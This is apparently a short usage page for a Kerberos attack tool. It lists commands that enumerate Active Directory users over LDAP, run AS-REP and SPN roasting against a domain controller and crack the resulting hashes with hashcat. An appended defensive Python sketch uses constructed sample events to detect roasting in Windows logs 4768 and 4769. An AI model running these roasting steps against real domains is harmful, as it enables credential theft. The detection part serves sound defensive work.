From securityonline.info
For the impatient
IMPORTANT: the accepted target URL formats for LDAP and Kerberos are the following:
<ldap_connection_url>: <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
<kerberos_connection_url>: <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
Steps -with SSPI-:
kerberoast auto <DC_ip>
Steps -SSPI not used-:
- Look for vulnerable users via LDAP
kerberoast ldap all <ldap_connection_url> -o ldapenum
- Use ASREP roast against users in the ldapenum_asrep_users.txt file
kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt
- Use SPN roast against users in the ldapenum_spn_users.txt file
kerberoast spnroast <kerberos_connection_url> -t ldapenum_spn_users.txt
- Crack SPN roast and ASREP roast output with hashcat
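
A defender-side companion to the steps above, as an added example that is not part of the original page or of the kerberoast project: it flags the Windows Security events (4768 and 4769) that ASREP roast and SPN roast leave on a domain controller. The event dictionaries are constructed samples with simplified fields, and `find_roasting` and `spn_threshold` are hypothetical names chosen for this sketch.

```python
from collections import defaultdict

# Constructed sample events (not from the page): simplified fields from
# Windows Security events 4768 (TGT request) and 4769 (service ticket request).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc_backup", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.21"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.EXAMPLE", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.EXAMPLE", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.EXAMPLE", "ServiceName": "svc_iis",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.EXAMPLE", "ServiceName": "FILESRV01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.21"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.EXAMPLE", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.21"},
]

RC4_HMAC = 0x17  # etype 23 (RC4-HMAC), the weak type commonly requested when roasting


def find_roasting(events, spn_threshold=3):
    """Return (asrep_hits, spn_hits) for a batch of 4768/4769 events.
    spn_threshold is an assumed tuning value: distinct user-account services
    requested with RC4 from one source before that source is reported."""
    asrep_hits = []
    rc4_services = defaultdict(set)
    for ev in events:
        etype = int(ev.get("TicketEncryptionType", "0x0"), 16)
        if ev["EventID"] == 4768 and ev.get("PreAuthType") == "0":
            # TGT issued without pre-authentication: AS-REP roastable account.
            asrep_hits.append((ev["IpAddress"], ev["TargetUserName"]))
        elif ev["EventID"] == 4769 and etype == RC4_HMAC:
            service = ev.get("ServiceName", "")
            # Machine accounts and krbtgt have random keys; skip them.
            if service.endswith("$") or service.lower() == "krbtgt":
                continue
            rc4_services[ev["IpAddress"]].add(service)
    spn_hits = {ip: sorted(names) for ip, names in rc4_services.items()
                if len(names) >= spn_threshold}
    return asrep_hits, spn_hits


if __name__ == "__main__":
    print(find_roasting(SAMPLE_EVENTS))
```

A single RC4 service ticket request is normal in many domains, which is why the SPN check counts distinct services per source instead of alerting on each event.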